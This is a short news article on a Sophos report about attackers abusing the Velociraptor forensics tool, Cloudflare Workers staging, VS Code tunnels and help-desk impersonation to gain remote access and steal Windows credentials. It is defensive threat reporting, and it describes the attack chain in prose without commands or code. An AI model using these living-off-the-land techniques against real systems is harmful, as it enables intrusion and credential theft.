Redazione RHC : 1 September 2025 17:23
Sophos has warned of an increasingly sophisticated attacker practice: the use of legitimate cybersecurity tools as part of a Living-off-the-Land (LotL) tactic, in which an attack is carried out using existing or publicly available software rather than internally developed malware.
In a recent incident, unknown attackers introduced Velociraptor, an open-source endpoint monitoring and digital forensics tool, into the victim’s infrastructure. The tool was installed via msiexec, downloading the MSI installer from a domain on the Cloudflare Workers platform.
It’s well known that threat actors often use “living-off-the-land” (LotL) techniques or exploit legitimate remote monitoring and management (RMM) tools for their attacks. However, the use of Velociraptor reveals a clear strategic shift, where incident response software is being used to gain an advantage while simultaneously reducing the need to deploy purpose-built malware.
The new investigation into the incident has revealed that the attackers exploited the Windows msiexec function to retrieve an MSI installation package from a Cloudflare Workers domain. This MSI installation package is the foundation for other tools used by the attackers, including a Cloudflare tunneling application and remote administration software known as Radmin.
The MSI file is designed to install Velociraptor, which then establishes contact with another Cloudflare Workers domain. The access is then exploited to download Visual Studio Code from the same staging server using a coded PowerShell command and run the source code editor with the tunnel option enabled to allow both remote access and remote code execution.
Similar techniques involving remote access tools have been linked to ransomware groups like Black Basta since mid-2024. These more recent campaigns forgo the preliminary email bombing phase and ultimately leverage remote access to deliver a PowerShell payload with capabilities commonly associated with credential theft, persistence, and remote code execution.
These attacks begin with threat actors using newly created or compromised tenants to send direct messages or initiate calls to targets, impersonating IT help desk teams or other trusted contacts. To install remote access software such as AnyDesk, DWAgent, or Quick Assist and take control of victims’ systems to spread malware.
Windows credentials can also be requested through these attacks, prompting users to enter their passwords in the form of a seemingly innocuous system setup request. These credentials are then collected and stored in a text file on the system.
Redazione